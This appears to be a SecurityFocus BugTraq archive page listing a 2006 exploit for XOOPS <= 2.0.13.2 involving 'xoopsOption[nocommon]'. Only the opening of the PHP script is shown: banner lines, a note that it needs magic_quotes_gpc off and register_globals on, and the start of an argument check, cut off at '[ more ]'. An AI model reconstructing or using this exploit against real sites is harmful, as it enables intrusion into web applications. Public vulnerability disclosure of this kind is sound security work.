BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit May 21 2006 04:39PM
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on

<?

echo "XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n\r\n";

/*

works with:

magic_quotes_gpc = Off

register_globals = On

*/

if ($argc<4) {

echo "...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus